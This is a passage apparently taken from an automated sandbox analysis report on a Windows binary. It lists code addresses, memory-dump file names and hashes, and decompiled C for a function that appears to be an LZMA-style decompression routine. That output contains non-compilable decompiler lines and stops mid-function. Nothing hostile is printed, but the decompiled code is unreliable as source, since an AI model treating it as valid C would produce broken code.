                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064a1
                                                                                                                        0x004064a1
                                                                                                                        0x004064a5
                                                                                                                        0x0040696b
                                                                                                                        0x00000000
                                                                                                                        0x0040696b
                                                                                                                        0x004064ab
                                                                                                                        0x004064ae
                                                                                                                        0x004064b1
                                                                                                                        0x004064b4
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b6
                                                                                                                        0x004064b9
                                                                                                                        0x004064bc
                                                                                                                        0x004064bf
                                                                                                                        0x004064c2
                                                                                                                        0x004064c5
                                                                                                                        0x004064c8
                                                                                                                        0x004064c9
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064cb
                                                                                                                        0x004064ce
                                                                                                                        0x004064d1
                                                                                                                        0x004064d4
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064d7
                                                                                                                        0x004064da
                                                                                                                        0x004064dc
                                                                                                                        0x004064dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x004064df
                                                                                                                        0x004064df
                                                                                                                        0x00000000
                                                                                                                        0x004064df
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x004069cc
                                                                                                                        0x004069cc
                                                                                                                        0x00000000
                                                                                                                        0x004069cc
                                                                                                                        0x00406819
                                                                                                                        0x004067a0
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x004063d4

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                        • Instruction ID: 235c9a1f152390887c8e3346b3cf8cf745e7d176c25095dba4735a56a8f4339d
                                                                                                                        • Opcode Fuzzy Hash: 040a7e0d789931a885e98904e34fb369bef72c7c312577bd0d6f252efd828c84
                                                                                                                        • Instruction Fuzzy Hash: 80714371D00229CBDF28CFA8C8447ADBBF1FB48305F15806AD846BB281D7395A96DF54
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004064EE, Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E004064EE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
